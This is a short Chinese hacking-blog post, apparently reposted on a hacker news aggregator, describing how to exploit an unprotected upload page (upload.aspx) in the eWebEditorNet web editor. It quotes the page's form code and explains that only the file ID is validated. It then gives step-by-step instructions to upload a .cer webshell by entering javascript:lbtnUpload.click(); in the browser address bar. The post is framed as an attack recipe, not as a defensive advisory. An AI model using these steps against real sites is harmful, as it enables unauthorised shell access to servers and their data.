记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

eWebEditorNet漏洞利用

2013-01-24 16:15

原理:eWebEditorNet/upload.aspx文件
<form id=”myform” method=”post” encType=”multipart/form-data” runat=”server”>
<INPUT id=”uploadfile” style=”HEIGHT: 18px” type=”file” size=”28″ name=”uploadfile” runat=”server”>
<asp:linkbutton id=”lbtnUpload” runat=”server”></asp:linkbutton></form>
<script language=”JavaScript”>
// 上传表单已装入完成
try {
parent.UploadLoaded();
}
catch(e){
}
</script>只是简单的对文件ID进行验证,只要构造javascript:lbtnUpload.click();就满足条件。
下面开始利用,打开eWebEditorNet/upload.aspx,选择一个cer文件。

 

再在IE地址栏里面输入javascript:lbtnUpload.click();回车就得到shell了。查看源码就可以看到上传shell的地址。

 

原创文章,转载请注明: 转载自98hacker's Blog | WtcHack.Com

本文链接地址: http://www.hackdig.com/?01/hack-1348.htm

知识来源: www.wtchack.com/?p=1162

阅读:122377 | 评论:0 | 标签:网络技术 eWebEditorNet 利用 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“eWebEditorNet漏洞利用”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词